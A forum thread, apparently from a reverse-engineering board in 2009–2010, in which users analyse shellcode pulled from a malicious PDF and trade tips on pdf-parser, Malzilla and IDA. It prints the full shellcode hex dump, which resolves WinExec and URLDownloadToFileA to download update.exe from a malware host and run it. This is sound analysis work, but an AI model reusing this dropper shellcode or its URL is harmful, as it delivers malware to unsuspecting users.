000000C0   5A 95 00 01 89 00 81 EA  5E C2 00 01 52 00 80 68   Z...^..R.h

000000D0   00 00 FF 00 4E 95 00 01  89 00 81 EA 5E C2 00 01   ...N...^..

000000E0   31 00 01 F6 8A C2 35 9C  02 6E 00 00 FB 80 74 00   1..5.n..t.

000000F0   88 06 32 1C EB 46 C6 EE  32 04 89 00 81 EA 45 C2   .2.F2..E

00000100   00 02 52 00 95 FF 01 52  00 00 EA 89 C2 81 02 50   ..R..R...P

00000110   00 00 50 52 95 FF 01 56  00 00 00 6A 00 6A EA 89   ..PR.V...j.j

00000120   C2 81 01 5E 00 00 89 52  81 EA A6 C2 00 02 52 00   .^..R..R.

00000130   00 6A D0 FF 05 6A EA 89  C2 81 01 5E 00 00 FF 52   .j.j.^..R

00000140   5A 95 00 01 9D 00 5F 5D  5A 5E 5B 59 C3 58 00 00   Z..._]Z^[YX..

00000150   00 00 00 00 00 00 00 00  00 00 00 00 00 00 65 47   ..............eG

00000160   54 74 6D 65 50 70 74 61  41 68 4C 00 61 6F 4C 64   TtmePptaAhL.aoLd

00000170   62 69 61 72 79 72 00 41  65 47 50 74 6F 72 41 63   biaryr.AeGPtorAc

00000180   64 64 65 72 73 73 57 00  6E 69 78 45 63 65 BB 00   dderssW.nixEce.

00000190   F2 89 F7 89 C0 30 75 AE  29 FD 89 F7 31 F9 BE C0   0u)1

000001A0   00 3C 00 00 B5 03 02 1B  00 00 AD 66 85 03 02 1B   .<.......*f...

000001B0   00 00 70 8B 83 78 1C C6  B5 03 02 1B 00 00 BD 8D   ..px.Ƶ.....

000001C0   02 1F 00 00 03 AD 1B 85  00 02 AB 00 03 AD 1B 85   .....*.....*.

000001D0   00 02 50 00 AD AB 85 03  02 1B 00 00 5E AB DB 31   ..P.*.....^1

000001E0   56 AD 85 03 02 1B 00 00  C6 89 D7 89 FC 51 A6 F3   V*.....Ɖ׉Q

000001F0   74 59 5E 04 EB 43 5E E9  D1 93 03 E0 27 85 00 02   tY^.C^ѓ.'..

00000200   31 00 96 F6 AD 66 E0 C1  03 02 1F 85 00 02 89 00   1.*f......

00000210   AD C6 85 03 02 1B 00 00  EB C3 00 10 00 00 00 00   *ƅ...........

00000220   00 00 00 00 00 00 00 00  00 00 89 00 1B 85 00 02   ..............

00000230   56 00 E8 57 FF 58 FF FF  5E 5F 01 AB 80 CE BB 3E   V.WX^_.λ>

00000240   02 74 ED EB 55 C3 4C 52  4F 4D 2E 4E 4C 44 00 4C   .tULROM.NLD.L

00000250   52 55 44 4C 77 6F 6C 6E  61 6F 54 64 46 6F 6C 69   RUDLwolnaoTdFoli

00000260   41 65 75 00 64 70 74 61  2E 65 78 65 00 65 72 63   Aeu.dpta.exe.erc

00000270   73 61 2E 68 68 70 00 70  74 68 70 74 2F 3A 61 2F   sa.hhp.pthpt/:a/

00000280   6F 64 65 62 75 2D 64 70  74 61 6E 69 2D 67 65 73   odebu-dptani-ges

00000290   76 72 63 69 2E 65 6E 63  6E 2F 6C 75 2F 6C 70 75   vrci.encn/lu/lpu

000002A0   61 64 65 74 70 2E 70 68  69 3F 3D 64 00 32 90 00   adetp.phi?=d.2.


HTTP URL is rotated in shellcode you can reverse it with simple code like:

Code:
char hi[] = "thpt/:a/odebu-dptani-gesvrci.encn/lu/lpuadetp.phi?=d\x0\x0";



int _tmain(int argc, _TCHAR* argv[])

{

	unsigned short *h = (unsigned short *)hi;

	while(*h)

	{

		*h = _byteswap_ushort( *h );

		h++;

	}	

	return 0;

}


PS: Sry for delayed reply i had my vacation
h4h4h4h4
August 12th, 2009, 14:44
blah... I found my problem.

So i was using the pdf inflater tool by bobby.

cmd > inflater.exe layoutBeenAll.pdf wtf

creates folder "wtf" with 13 seperate .tmp files, one for each FlateDecode stream. File 11.tmp has the obs javascript, but it doesnt capture all of it.

the file is 8kb.

When i use pdf-parser by dider stevens, i find the obs. javascript stream and capture it in a text called 'full.tmp' the filesize is 44kb.

DOH!!

Now i get the full shellcode:

Code:


seg000:00000000  53 50 51 52 56 57 55 9C  E8 00 00 00 00 5D 83 ED  SPQRVWUF....]f

seg000:00000010  0D 31 C0 64 03 40 30 78  0C 8B 40 0C 8B 70 1C AD  

1+d@0x@p

seg000:00000020  8B 40 08 EB 09 8B 40 34  8D 40 7C 8B 40 3C 56 57  @d	@4@|@<VW

seg000:00000030  BE 5E 01 00 00 01 EE BF  4E 01 00 00 01 EF E8 D6  +^..e+N..nF+

seg000:00000040  01 00 00 5F 5E 89 EA 81  C2 5E 01 00 00 52 68 80  .._^O-^..Rh

seg000:00000050  00 00 00 FF 95 4E 01 00  00 89 EA 81 C2 5E 01 00  ...*N..O-^.

seg000:00000060  00 31 F6 01 C2 8A 9C 35  63 02 00 00 80 FB 00 74  .1-5c..v.t

seg000:00000070  06 88 1C 32 46 EB EE C6  04 32 00 89 EA 81 C2 45  2Fde2.O-E

seg000:00000080  02 00 00 52 FF 95 52 01  00 00 89 EA 81 C2 50 02  ..R*R..O-P

seg000:00000090  00 00 52 50 FF 95 56 01  00 00 6A 00 6A 00 89 EA  ..RP*V..j.j.O

seg000:000000A0  81 C2 5E 01 00 00 52 89  EA 81 C2 78 02 00 00 52  -^..RO-x..R

seg000:000000B0  6A 00 FF D0 6A 05 89 EA  81 C2 5E 01 00 00 52 FF  j.*-jO-^..R*

seg000:000000C0  95 5A 01 00 00 89 EA 81  C2 5E 01 00 00 52 68 80  Z..O-^..Rh

seg000:000000D0  00 00 00 FF 95 4E 01 00  00 89 EA 81 C2 5E 01 00  ...*N..O-^.

seg000:000000E0  00 31 F6 01 C2 8A 9C 35  6E 02 00 00 80 FB 00 74  .1-5n..v.t

seg000:000000F0  06 88 1C 32 46 EB EE C6  04 32 00 89 EA 81 C2 45  2Fde2.O-E

seg000:00000100  02 00 00 52 FF 95 52 01  00 00 89 EA 81 C2 50 02  ..R*R..O-P

seg000:00000110  00 00 52 50 FF 95 56 01  00 00 6A 00 6A 00 89 EA  ..RP*V..j.j.O

seg000:00000120  81 C2 5E 01 00 00 52 89  EA 81 C2 A6 02 00 00 52  -^..RO-..R

seg000:00000130  6A 00 FF D0 6A 05 89 EA  81 C2 5E 01 00 00 52 FF  j.*-jO-^..R*

seg000:00000140  95 5A 01 00 00 9D 5D 5F  5E 5A 59 5B 58 C3 00 00  Z..]_^ZY[X+..

seg000:00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65  ..............Ge

seg000:00000160  74 54 65 6D 70 50 61 74  68 41 00 4C 6F 61 64 4C  tTempPathA.LoadL

seg000:00000170  69 62 72 61 72 79 41 00  47 65 74 50 72 6F 63 41  ibraryA.GetProcA

seg000:00000180  64 64 72 65 73 73 00 57  69 6E 45 78 65 63 00 BB  ddress.WinExec.+

seg000:00000190  89 F2 89 F7 30 C0 AE 75  FD 29 F7 89 F9 31 C0 BE  =0+u)1++

seg000:000001A0  3C 00 00 00 03 B5 1B 02  00 00 66 AD 03 85 1B 02  <.....f

seg000:000001B0  00 00 8B 70 78 83 C6 1C  03 B5 1B 02 00 00 8D BD  ..px..+

seg000:000001C0  1F 02 00 00 AD 03 85 1B  02 00 00 AB AD 03 85 1B  ....

seg000:000001D0  02 00 00 50 AB AD 03 85  1B 02 00 00 AB 5E 31 DB  ..P..^1

seg000:000001E0  AD 56 03 85 1B 02 00 00  89 C6 89 D7 51 FC F3 A6  V..+Qn=

seg000:000001F0  59 74 04 5E 43 EB E9 5E  93 D1 E0 03 85 27 02 00  Yt^CdT^-a'.

seg000:00000200  00 31 F6 96 66 AD C1 E0  02 03 85 1F 02 00 00 89  .1f-a..

seg000:00000210  C6 AD 03 85 1B 02 00 00  C3 EB 10 00 00 00 00 00  ..+d.....

seg000:00000220  00 00 00 00 00 00 00 00  00 00 00 89 85 1B 02 00  ............

seg000:00000230  00 56 57 E8 58 FF FF FF  5F 5E AB 01 CE 80 3E BB  .VWFX***_^+>+

seg000:00000240  74 02 EB ED C3 55 52 4C  4D 4F 4E 2E 44 4C 4C 00  tdf+URLMON.DLL.

seg000:00000250  55 52 4C 44 6F 77 6E 6C  6F 61 64 54 6F 46 69 6C  URLDownloadToFil

seg000:00000260  65 41 00 75 70 64 61 74  65 2E 65 78 65 00 63 72  eA.update.exe.cr

seg000:00000270  61 73 68 2E 70 68 70 00  68 74 74 70 3A 2F 2F 61  ash.php.http://a

seg000:00000280  64 6F 62 65 2D 75 70 64  61 74 69 6E 67 2D 73 65  dobe-updating-se

seg000:00000290  72 76 69 63 65 2E 63 6E  2F 6E 75 6C 6C 2F 75 70  rvice.cn/null/up

seg000:000002A0  64 61 74 65 2E 70 68 70  3F 69 64 3D 30 00 00 90  date.php?id=0..


Sweet!. Thanks. Ill stop using the inflater tool by bobby.

Next step is to download the trojan and practice RCE on it
d3t0n4t0r
October 12th, 2009, 12:21
Hello,
I'm quite new in analysing malicious pdf and I want to learn from you guys

Actually I am getting a hard time to get the shell code from layoutBeenAll.pdf
I've tried using the inflater.exe but didn't get the decoded shellcode
I also used pdf-parser.py but same result.
and what tool do u use to analyse the shellcode with hex ? I'm using hexdump and hexedit but cannot get to find the malware URL
h4h4h4h4
January 14th, 2010, 13:44
use pdf-parser not inflater. I had trouble when i used inflater.

pdf-parser.py -fw [pdfname] > dumpfile.txt

open dumpfile.txt, grab the javascript.


paste it in malzilla, find the shellcode "%u encoded string"

"UCS2 to hex" button inside malzilla, shellcode turns into hex values.

paste hex into hexview and u can see the url from the shellcode.

You can also use a "shellcode2exe" tool and load it into IDA pro.
Silkut
January 14th, 2010, 14:11
http://blog.didierstevens.com/programs/pdf-tools/ =)